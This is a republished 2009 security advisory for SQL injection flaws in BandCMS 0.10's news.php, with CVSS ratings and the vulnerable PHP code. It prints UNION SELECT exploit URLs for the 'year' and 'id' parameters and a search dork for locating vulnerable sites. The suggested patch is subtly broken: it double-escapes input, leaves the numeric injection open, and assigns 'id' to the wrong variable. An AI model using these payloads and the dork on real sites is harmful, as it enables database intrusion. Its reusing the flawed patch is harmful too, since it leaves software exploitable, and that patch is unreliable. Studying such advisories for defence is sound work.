BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities

2009.09.22
Credit: Affix
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################################# # _______ _________ _ # # ( ____ )\__ __/( ( /| # # | ( )| ) ( | \ ( | # # | (____)| | | | \ | | # # | __) | | | (\ \) | # # | (\ ( | | | | \ | # # | ) \ \__ | | | ) \ | # # |/ \__/ )_( |/ )_) # # http://root-the.net # ################################################################# #[+] BandCMS v0.10 news.php Milti SQL Injection Vulnerabilities # #[+] Vendor : http://rockband.sourceforge.net/ # #[+] Exploit : Affix <root@root-the.net> # #[+] Dork : "Powered by Rock Band CMS 0.10" # #[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # # str0ke, tekto, raT, uNkn0wn.ws, ryan1918.com # ################################################################# # BandCMS v0.10 Has an SQL Injection in news.php # # # # Code : # # if(isset($_GET['year'])){ # # $year = $_GET['year']; # # $smarty->assign('news', $db->getNewsYear($year)); # } # # # # # # Exploit : # # http://site.com/news.php?year=-2004+UNION+SELECT+1,2,3,4-- # # # # # Code : # # $id = $_GET['id']; # # $newsItem = $db->getNewsItem($id); # # $smarty->assign('news', $newsItem); # # # # Exploit : # # http://site.com/news.php?id=-1+UNION+SELECT+1,2,3,4-- # # # # # # Patch : # # Since Im a Nice guy here is a change both variables as # # follows # # # # $year = addslashes(mysql_real_escape_string($_GET['year'])); # # # # $year = addslashes(mysql_real_escape_string($_GET['id'])); # # #################################################################

References:

http://xforce.iss.net/xforce/xfdb/52940
http://www.vupen.com/english/advisories/2009/2494
http://www.milw0rm.com/exploits/9553
http://secunia.com/advisories/36517


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top